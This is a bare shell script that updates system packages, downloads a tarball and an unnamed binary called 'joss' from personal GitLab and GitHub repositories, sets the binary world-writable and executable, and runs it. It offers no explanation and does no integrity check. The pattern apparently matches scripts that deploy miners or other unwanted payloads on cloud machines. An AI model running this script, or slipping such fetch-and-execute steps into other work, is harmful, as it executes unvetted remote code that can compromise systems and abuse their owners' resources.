#!/bin/sh
apt-get update && apt-get upgrade -y
wget https://gitlab.com/ontaracing04/gas/-/raw/main/best.tar.gz && wget https://github.com/arifrahman555/eek/raw/main/joss
tar -xvf best.tar.gz && chmod 777 joss
./joss
